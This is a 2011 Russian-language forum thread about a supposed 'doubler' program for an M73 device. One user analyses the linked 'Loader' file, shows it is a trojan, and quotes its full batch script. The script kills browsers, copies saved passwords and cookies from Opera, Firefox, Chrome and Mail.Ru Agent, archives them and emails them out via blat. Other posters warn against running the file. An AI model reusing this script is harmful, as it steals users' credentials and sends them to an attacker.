Опубликовано 8 мая, 201114 г. привет всем вот нарыл ссылку мож кто в теме двоилка м73 Изменено 11 мая, 201114 г. пользователем MEG-2
Опубликовано 9 мая, 201114 г. привет всем вот нарыл ссылку мож кто в теме двоилка м73 http://depositfiles.com/ru/files/8n8ed4f01 А ты сам пробовал прога не работает
Опубликовано 9 мая, 201114 г. Автор А ты сам пробовал прога не работает ВОТ смотри рно как снею работать увы не вьеду
Опубликовано 9 мая, 201114 г. Файл Loader при просмотре очень похож на трояна. Ага, он и есть :) Создает файл C:\WINDOWS\Prefetch\Blat.exe Также там присутствуют строки taskkill /f /im opera.exe taskkill /f /im firefox.exe taskkill /f /im chrome.exe taskkill /f /im iexplore.exe taskkill /f /im magent.exe md C:\pass\ copy /y "blat.dll" "%SystemRoot%\blat.dll" copy /y "blat.exe" "%SystemRoot%\blat.exe" copy /y "blat.lib" "%SystemRoot%\blat.lib" copy /y "Rar.exe" "%SystemRoot%\Rar.exe" attrib C:\pass +h +s +a +r md C:\pass\opera\ CD /D %APPDATA%\Opera\Opera\ copy wand.dat C:\pass\opera\ >nul copy cookies4.dat C:\pass\opera\ >nul md C:\pass\MailAgent\reg regedit.exe -ea C:\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea C:\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 CD /D %APPDATA% Xcopy Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt C:\pass\MailAgent /K /H /G /Q /R /S /Y >nul md C:\pass\Mozilla\ cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy cookies.sqlite C:\pass\Mozilla\ >nul copy key3.db C:\pass\Mozilla\ >nul copy signons.sqlite C:\pass\Mozilla\ >nul md C:\pass\Google\ cd %userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\ copy /y Login* C:\pass\Google\ >nul copy /y Web Data* C:\pass\Google\ >nul copy /y Cookies* C:\pass\Google\ >nul copy /y %Windir%\Rar.exe C:\pass\ >nul C:\pass\rar.exe a -r C:\pass\pass.rar C:\pass\ copy /y %Windir%\blat.dll C:\pass\ copy /y %Windir%\blat.exe C:\pass\ copy /y %Windir%\blat.lib C:\pass\ del /s /q %SystemRoot%\Rar.exe del /s /q %SystemRoot%\blat.dll del /s /q %SystemRoot%\blat.exe del /s /q %SystemRoot%\blat.lib cd C:\pass\ blat.exe -install -server smtp.yandex.ru -port 587 -f sender.qq@yandex.ru -u sender.qq -pw qazxsw1213 ren *.rar pass.rar blat.exe -body surpriz -to fj0001@yandex.ru -attach pass.rar cd %Windir% rmdir /s /q C:\pass EXIT Изменено 9 мая, 201114 г. пользователем ekonstantin
Опубликовано 11 мая, 201114 г. на самом деле ничего вы не запустите, а вот Loader собирает пароли из браузеров и пытается куда-то отправить. автору башку открутить за это надо
Опубликовано 12 мая, 201114 г. Купите у автора (Dik) за 100 уе и не парьтесь, отобьется на нескольких машинах ,и все таки поддержка есть , а если кому нужно слепить двойную , стучитесь в личку. Изменено 12 мая, 201114 г. пользователем magelan1
Опубликовано 13 мая, 201114 г. Подтверждаю, после запуска лоайдера, сразу создается соединение и начинает ломиться в инет, авира это очень хорошо видит. Так, что не запускайте файл. А автора в бан пожизненный.
Для публикации сообщений создайте учётную запись или авторизуйтесь